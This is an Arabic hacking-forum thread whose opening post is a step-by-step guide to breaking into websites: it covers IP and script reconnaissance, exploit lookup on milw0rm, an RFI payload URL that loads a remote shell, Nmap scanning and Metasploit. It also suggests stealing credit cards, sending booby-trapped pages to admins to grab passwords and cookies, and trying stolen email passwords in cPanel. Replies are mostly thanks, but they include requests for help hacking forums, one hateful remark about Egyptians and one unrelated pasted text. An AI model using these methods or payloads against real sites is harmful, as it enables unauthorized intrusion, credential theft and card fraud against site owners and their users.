تسجيل الدخول

مشاهدة النسخة كاملة : شرح أختراق أي موقع او منتدي تريده



علي عفر
07-15-2010, 01:22 AM
السلام عليكم أخواني أعضاء جيوش الهكرز
اليوم جايبلكم شرح لأختراق اي موقع يعني مهما كان نوعه بس لازم يكون عندك شوية خبرة (غير مبتدئ)عشان تقدر تمشي معاي خطوة خطوة.
نبدأ على بركة الله :

اولا اختار الموقع المطلوب اختراقه مثلا http://www.sitename.com/
نشيل كلمة اسم الموقع ونحط اسم الموقع المراد اختراقه طيب حددنا هدفنا شوف معاي نجيب ثغره ازاىاول حاجه نطالع اى بى الموقع طيب نطالعه ازاى شوف معاي فى الصوره كده طيب الامر هكذا:-
نفتح الدوس و نكتب Ping http://www.sitename.com
نشيل اسم الموقع و نحط اسم الموقع المراد اختراقه :



طيب نركن الابى و ندور جوه الموقع على حاجه زى كده
Powered by xxx
الاكسات دى اسم الاسكربت طيب ناخد الاسم و نطير على الميل ورم او السيكيورتى فوكس و نبحث عن ثغره له
فلنفرض ان اسم الاسكربت
jGallery
نطير على الميلورم
http://milw0rm.com/search



طيب بعد من دوس هيطلعلنا الثغره كده



الاستغلال كالاتى
http://المكان/ اللى فيه الاسكربت المصاب/الموقع المراد اختراقه/index.php?index.php?G_JGALL[inc_path]=http://.txt
شل على هيئة txt
طيب نفرض اننا مالاقينا الاسكربت مصاب صاحب الموقع مرقع كل الثغرات نلم العده و نقوم. لا يا سيدي لسا عندنا حيل
نجيب الاى بى و نروح على
http://msn.search.com/
و نكتب زى اللى فى الصوره علشان نبحث عن جميع المواقع اللى على السيرفر و فيها كلمة
Powered byملحوظه :-*مش كل المواقع اللى بتطلع بتبقى على نفس السيرفر احيانا*



طيب ظهر لنا مواقع كتيره على السيرفر و فيها اسكربتات واضحه نروح للميل ورم و انشاء الله نلاقى لها ثغرات طيب لو ملقناش تابع
طيب احنا ملقناش اسم الاسكربت زى ما انت قلت
نشوف ملف مميز فى روابط الموقع او المواقع اللى على السيرفر و نعمل بحث عنه فى جوجل تلاقى مواقع كاتبه اسم الاسكربت
جبت اسم الاسكربت و مالقيت ثغرات نادرا او ماعرفت اجيبه او مقفوله ثغراته مفيش الا حل واحد هوه ان انتا تدور يدوى على الثغرات
هتقولى ازاى هقولك دور على ثغرة اسكل او اكس اس اس و شرح هذه الثغرات هنا فى الموقع
طيب برضه مفيش فايده مش لاقى خالص
نجرى على طول على موقع الاستضافه و نشوف مركب اسكربت ايه
وأذا ما تعرف مواقع للأستضافه اعطيك هذا يفيدك:http://www.netcraft.com



هيطلع لنا كده



كله واضح الحمد لله
طيب ملقناش برضه اى حاجه تقدر تساعدنا لاختراق الموقع المراد طيب ندخل تانى على النت كرافت و شوف معايا



نجيب الثغرات من هذا الرابط
http://www.****sploit.com:55555/
شيل ال**** و ضع مكانها m e t a بدون مسافة
ملحوظه: يجب انت تكون لديك خبره بالميتاسبلوت للتعامل مع هذا الموقع لان جميع ثغراته ميتا
طيب لاقينا صاحب السيرفر ميه ميه مفيش و لا ثغره عنده فى السيرفر
يالا بينا نشوف طريقه نجيب اى فاحص منافذ و ليكن
Nmapللتحميل
http://download.insecure.org/nmap/di...4.20-setup.exe
Start ----> Run ----> CMD -----> NMAP
وذلك لأنظمة تشغيل الويندوز
بمجرد إدخال IP أو Domain Name فإن NMAP يحدد الهدف المطلوب فحصه و ل NMAP القدرة علي فحص أي مدي من الأيبيهات في نفس الوقت ولكن ذلك سيأخذ وقت كبير جدا لإظهار النتائج ويجب أن يلاحظ أن في عملية الفحص عموما ليس من الضروري والمنطقي القيام بفحص جميع البورتات لإنها عملية ستأخذ وقت كبير جدا
عملية السكان و أوامر البرنامج في الحالات المختلفة وهي أوامر ليس لها علاقة بفحص البورتات أو نظام التشغيل
الامر sL
هو عبارة عن List Scan وبإستخدام فإن NMAP سيقوم بفحص الأي بي المحدد ولكن دون إرسال مجسات حقيقية و لكن النتائج في معظم الحالات إن لم تكن كلها تكون سلبية وهذا الأمر لا يمكن إستخدامه مع أوامر فحص البورتات و إكتشاف أنظمة التشغيل
الامر sP
هو عبارة عن Ping Scan الأمر مفيد إلي حد ما في عملية إسكتشاف الأجهزة العاملة في مدي أي بي معين أو المتصلة بسيرفر أو شبكة معينة
بإستخدام هذا الأمر فإن البرنامج يرسل رسالة ICMP وهي تعني Internet Control Message Protocol حيث يتم التأكد من مدي إستجابة الجهاز من عدمه وعموما ودون الدخول في التفاصيل الخاصة بهذه الرسالة فإن هذه الأداة تستخدم في إستكشاف الأخطاء الموجودة بالشبكة ومدي تقبل إتصال خدمة معينة وهذه الرسالة تطلب إتصال TCP إلي البورت 80 وهو البورت المخصص لبروتوكول ال Http . و عملية ال Ping في حد ذاتها عملية مهمة جدا بالنسبة للشبكات ولكن إستخدامها بمفردها لن يؤدي لأي نتائج لأن أي فايروول سيرفض العملية من أساسها ولكن الأفضل هو إستخدام أمر Ping مع أوامر أخرى أكثر تعقيدا . وسيتم شرح ذلك.

الأمر P0
وهو يعني No Ping حيث لا يتم إستكشاف الأجهزة قبل البدء في عملية الفحص وهو أمر ضروري في حالات فحص البورتات و حالات فحص نوع نظام التشغيل مع ملاحظة أن و بإستخدام هذا الأمر فإن NMAP سيقوم بعملية الفحص بلا أي إسكتشاف ومعظم عمليات الفحص لا تتم بدون هذا الأمر

الأمر Ps
وهو يعني TCP SYN Ping وفيه يتم إرسال رسائل TCP فارغة في زمن محدد و ال TCP هو أحد بروتوكولات الإتصال ونقل البيانات بين الأجهزة داخل الشبكة أو عن طريق الإنترنت Transmission Control Protocol
وذلك إلي بورت أو أكثر حيث يتم تحديد رقم البورتات بجانب الأمر و إذا تم تركه فارغا فسيتم إستخدام البورت 80 . هذه الرسلة التي سيتم إرسالها ستطلب الإتصال و بالطبع فالجهاز الآخر سيرفض الإتصال برسالة RST أو reset وذلك في حالة إذا كان البورت مغلق و هو غالبا ما يحدث ولكن في حالة وجود البورت مفتوح فإن الرد سيكون بقبول الإتصال برسالة تسمي SYN/ACK TCP و في النهاية فإن جهازك سيقوم بإرسال رسالة RST reset ولكن الهدف هنا هو إكتشاف ودراسة رد الفعل من الجهازالآخر وليس إجراء إتصال فقبول الإتصال معناه وجود خطأ يجب إصلاحه أو إستغلاله حسب الحاجة

الأمر PA
وهو يعني TCP ACK Ping ولاحظ الإختلاف بين هذا الأمر وا لأمر الذي قبله حيث في هذا الأمر يستبدل syn بACK وذلك لتعريف رسالة الإتصال من البداية
ولاحظ أن إستخدام SYN أو ACK يزيد من فرصة التغلب علي الفايروول الخاص بالراوتر حيث يتم رفض الإتصالات بمجرد إرسال الرسائل الفارغة و كل فايروول له طريقته في التعامل مع مثل هذه الإتصالالت وهو ما سوف يتم شرحه في موضوع آخر

الأمر PU

يعني udp ping أي User Datagram Protocol و هو نوع آخر من أنواع الإتصال ونقل البيانات بين الأجهزة ولكن يتميز عن ال TCP بالسرعة حيث يتم إرسال رسائل قصيرة وسريعة في فترة وجيزة للغاية وبالطبع يتم تحديد البورت المراد إستخدامه بعد كتابة الأمر مباشرة ويمكن الإختيار من بين 65,535 بورت و بمجرد أن يتم إرسال من هذا النوع إلي الجهاز الآخر وعند وجود البورت مغلق فإنه يتم الرد برسال ICMP وبالتالي فإنه يتم إكتشاف أن الجهاز يعمل ومن الممكن إجراء سكان قوي عليه

وهذه الأوامر هي معظم الأوامر التي تستخدم في عملية الإستكشاف لأي أي بي أو شبكة
ومرة اخري فإن التدريب علي برنامج سيعلمك الكثير في أمور إستكشاف الشبكات و الأجهزة و إكتشاف الأخطاء
وبعد ذلك سيتم إستكمال الأوامر الخاصة بإكتشاف البورتات و نظام التشغيل وكذلك البرامج والخدمات التي يمكنها الإتصال وذلك بالجهاز أو الشبكة الذي يجري عليه الفحص



طيب هتقولى اعمل ايه يعنى بيه لو لاقيت بورتات مفتوحه و ده اكيد عندك حاجه من الاتنين يا أما تحاول تدخل عليها بالطريقه دى
http://www.sitename.netort/
نشيل بورت و نحط رقم البورت و نشيل اسم الموقع و نحط اسم الموقع المراد
طيب ممكن ندخل من على الدوس و نعرف مثلا نوع الاف تى بى و ممكن نلاقيله ثغرات او عن طريق التلنت
طيب مفيش حاجه من اللى انت بتقولها دى نفعه اعمل ايه؟
تعالى اتعلم بعض الحيل
اول حيله انك تروح لشركة الاستضافه اللى عليها الموقع و تقول لهم انك عايز تجرب الخدمه قبل ما تشترك عندهم هيدولك باس و يوزر اف تى بى و عيش و مش فعالة قوى
ثانيا ممكن تسرق فيزا و تشترك فى السيرفر و نفس الكلام اللى فوق
ملحوظه سرقة الفيزات حرام شرعا و مرفوضه
ثالثا ممكن لو معاك ملير تلغم صفحه و تبعتها الادمن يعنى و تخترق جهازه و تطلع الباسوردات اللى على جهازه او تاخد الكوكيز ده لو انت ملقتش ثغرة اكس اس اس او تأخد اميله و ممكن تلاقى فيه الباس
رابعا تجرب باس الايميل فى السى بانل طيب هتقولى انا معيش اليوزر تعالى اوريك تطلع اليوزر ازاى
ندخل على الموقع المستهدف و بعد الرابط نكتب:
cgi-sys/scgiwarp





الى هنا ينتهى الشرح

حـمـتـو
07-15-2010, 06:54 AM
شكرا مافي فايده والله

هكر داون
07-15-2010, 02:19 PM
مشكور بس مافى فايدة

نفر هكرز
08-13-2010, 10:53 PM
مشكوررر الله يعطيك العافية
تحياتي (hoos)

hooos
08-13-2010, 11:47 PM
مشكور والله يعطيك العافيه
بس للاسف انا مبتدئ يعني اطلع احسن لي<<خخخ

e . V . E . L
08-14-2010, 06:06 PM
مشكوووووووووور حبيبي ... ماقصرتـ ,,,,

niper$
08-25-2010, 01:19 PM
لا يوجد صور يا صديقي رجاءا تاكد من الصور بالدرس لكي يستفيد الجميع

مجنن الهكر
08-31-2010, 10:25 PM
شكراً جزيت خيراً

benzaxoll
08-31-2010, 11:27 PM
طريقة قديمة وايضا موقع الميلوورم أغلق... لكن مفيدة لتعلم اساسيات الأختراق ... يعطيك العافية ....

kacha23
08-31-2010, 11:54 PM
ماتنفع كانت تستعمل في 2005 و2006

الجـزائـري
09-01-2010, 01:29 AM
مشكوووووووووور حبيبي ... ماقصرتـ ,,,,

teto2042
09-01-2010, 02:54 AM
مشكووووووور يا بطل

فهد كوم
09-04-2010, 07:11 AM
مشكوووووووووووووووووووووو ر

جندي مستجد
09-04-2010, 07:36 AM
مشكور على الشرح يكفي انك شرحت

ALONE
09-05-2010, 06:01 AM
شكور يا سيدي

soufyane
09-05-2010, 06:24 PM
شكرا بصح والله ما فهمت حاجة

soufyane
09-05-2010, 06:29 PM
انا نكره المصريين خاصة جدو

black moon
09-05-2010, 09:43 PM
الميلروم مغلق

المخترق المغربي
09-08-2010, 07:21 PM
طريقة قديمة وايضا موقع الميلوورم أغلق... لكن مفيدة لتعلم اساسيات الأختراق ... يعطيك العافية ....

هاكر 2010
09-12-2010, 04:52 PM
مشكور بس مفيش فيده

الملك كوبرا
09-12-2010, 10:38 PM
شكور اخي عل جهودك بس بتمنى المواظيع هي بتكون بشرح فيديو احسن منشان الي بدو بيتعلم يعني هلا بتحكي تغرة هي وهي
انا وياك بنعرفها بس الباقي ؟؟؟
والمنتدى هاد هدفهو بيلعم وشكرااااااااااااااااااااا ااا تقبل مروي يا غالي

مشاآاغب
09-13-2010, 01:57 AM
مشكوور اخوي وماتقصر.

P_F_L_P
09-14-2010, 01:01 AM
حلو حلو .. جاري التهكير لمنتدى مسومس

satan-jxx
09-14-2010, 10:54 AM
مشكوووووووووور حبيبي ... ماقصرتـ ,,,,

yacineDz
10-05-2010, 03:21 PM
مشكووووووووووووووووووور اخي

نورالدين N
10-20-2010, 12:00 PM
مشكور بس مافى فايدة

tarik_leking
10-21-2010, 05:10 PM
أولا مافي أي هكرز محترف يعطيك طريقة فعالة في الإختراق لإن عمله الوحيد و حرفته

Mr.FalcoN
10-21-2010, 05:49 PM
مشكور اخي
طريقة قديمة

MMTT
11-29-2010, 05:25 AM
صراحه اهنيك على اسلوب شرحك دكتور ماشالله عليك
وكمان مو مخلي ولا طريقه الا جايبها
واهيك كمان على طول بالك بالشرح ولك احلى تقييم فل مارك

black star
12-07-2010, 03:58 PM
مافهمت شيء؟؟؟؟؟؟؟؟؟؟؟؟

Mr:X
12-09-2010, 01:57 PM
مشكووووور اخوي بس صعبه شوي

أبن غزة
12-09-2010, 08:56 PM
مشكور ما نفع الأمر أنا كمبتدئ غير مدرك لهذه الأشاء
لو في شرح بالفديو لو كان أفضل

Black Spider
01-16-2011, 09:39 AM
بارك االله فيك اخي

طرحت فابدعت اخوي

الإرهابي
02-03-2011, 09:11 PM
مشكراااا على الافادة

mos.b
12-26-2011, 11:54 PM
اسم العينةالمملكةالشعبةالطائف ةاخطبوط أو حبارالحيوانيةالرخوياترأسي ة الارجلالحلزونالحيوانيةالر خوياتبطنية الارجلالمرجانالحيوانيةالل اسعات ام 44الحيوانيةالمفصلياتخطافية الارجلالنحلة + الجرادةالحيوانيةالمفصليات الحشراتسرطان + روبيانالحيوانيةالمفصلياتا لقشرياتالعقربالحيوانيةالم فصلياتالعنكبياتبلانارياال حيوانيةديدان مفلطحةتربلارينادودة الشريطيةالحيوانيةديدان مفلطحةديدان شريطيةالهيدراالحيوانيةالل اسعاتالاسفنجالحيوانيةالاس فنجياتدودة العلقالحيوانيةديدان حلقيةالهيرودينانجم البحرالحيوانيةشوكيات الجلدالنجميات

اسم العينةالمملكةالشعبةالطائف ةالاسبيروجيراالطلائعياتال طحالبالأميباالطلائعياتأول ياتالبراميسيومالطلائعياتأ ولياتفطر عفن الخبزالفطرياتالفطريات الاقترانية

الجنون40
12-29-2011, 08:00 PM
شكرااا
لم افهم شي !

poiu
12-30-2011, 07:49 PM
السلام عليكم
اريد مساعدة منكم رجاءً في اختراق منتدى من لديه الاستعداد
يساعدني يواصلني على الخاص ان امكن

ارجوكم

midof
01-04-2012, 06:28 PM
هل تعرف ما هي تغرات منتديات في بي رجاء 38x

midof
01-04-2012, 06:29 PM
الاميل رجا احد يساعدني [email protected]

zazo13
01-04-2012, 07:14 PM
mshkorrrrrrrrrrrrrrr

ajw.libya
01-23-2012, 08:12 PM
مشكوررر على المجاهود

El Faizey
03-06-2012, 02:21 AM
بالتوفيــــــــــــــــــ ــــــــــــــق

TMOO
08-12-2012, 02:07 AM
مشكور اخوي

lolomoe
08-19-2012, 07:16 AM
شكرا لالك
حاسة حالي زي اللي بتدرس لامتحان ومو فاهمة شي:(

zaizo max
08-31-2012, 03:37 PM
طريقة اساسية لتعلم الاساسيات ولكن بدل www.milworm.com ناخد www.exploit .com برضو بيعرض سغرات وكيفية استغلالها
وعلى كلالالالالا مشكور جدا

awab99
09-02-2012, 02:34 AM
مشكوووووووووووووووووووووو ووووووووور على الشرح

HaCkeR Gold
10-25-2012, 06:39 PM
مشكوووووووووور يااا علي

flashmen
12-21-2012, 11:09 PM
بارك الله فيك على الشرح، لكن تنقصه الصور
الرجاااء التعديل

yamen cr hacker
12-24-2012, 07:31 PM
مشكووووووور على الشرح بس لو كان موثق بالصور كان أفضل و أحسن
تقبل مروري ~~~

salah2020
12-27-2012, 04:03 PM
يسلمو كثير

dark haCk
12-27-2012, 06:37 PM
مشكوررررررررررررررررررررر ررررررررررررررررررر :)

قناص الانبار
12-28-2012, 02:17 PM
الطريقة قديمة جدآ ولم تعد صالحة

أضف الى ذلك ان موضوعك لآ يحتوي على الصور


على العموم شكرا لك على مجهودك

mr.selfster
12-28-2012, 03:02 PM
قريب اكون هكر مواقع

Black Samurai
01-12-2013, 06:22 PM
شكرااااااااااا

XLR-8
01-13-2013, 07:09 PM
الطريقه طويله جدا
ولافائده

etos
02-07-2013, 05:10 AM
شكراااااااااااا على الاستفاده
دومت بخير

bayome
02-08-2013, 10:59 PM
شكرا لك على مجهودك العالى اخوى